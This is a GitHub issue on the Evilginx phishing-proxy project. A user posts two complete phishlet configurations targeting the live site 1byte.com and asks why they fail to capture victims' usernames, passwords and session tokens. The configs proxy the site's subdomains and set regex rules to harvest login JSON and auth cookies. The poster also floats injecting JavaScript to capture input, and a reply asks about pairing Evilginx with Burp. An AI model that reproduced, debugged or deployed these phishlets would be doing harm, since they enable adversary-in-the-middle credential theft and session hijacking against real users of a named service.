Evilginx ver 3.3.0 cannot capture credentials #1109

Open
alasalamont opened this issue Sep 17, 2024 · 2 comments

alasalamont commented Sep 17, 2024

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all,
I am using Evilginx 3.3.0 and testing against the domain 1byte.com, but I cannot catch the credentials.

  • Here is the POST request. The site uses JSON format, therefore the type in credentials must be json
    image

  • Here are the cookies stored in the browser. The needed cookies are auth._token_expiration.local and auth._token.local
    image

  • I did try testing the regular expression for catching the value of username + password. It works
    image

  • And here is my 1st phishlet, which did not work :(

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['auth.token_expiration.local:always', 'auth._token.local:always']
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

  • For the second phishlet, I specified all the domains correctly, but I encountered an issue with setting the value of auth_urls. The landing page is 1byte.com, but after logging in, the user dashboard uses bo.1byte.com and the content is retrieved from api.1byte.com. Since I set 1byte.com as the landing page in the proxy host, there's no way to instruct Evilginx to check api.1byte.com using the auth_urls after the login.

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!


iliwasel commented Oct 2, 2024

I am trying to reproduce your issue, but how did you manage to get evilginx and burp suite to work together?
I get Cannot read TLS response from mitm'd server proxyconnect tcp: EOF
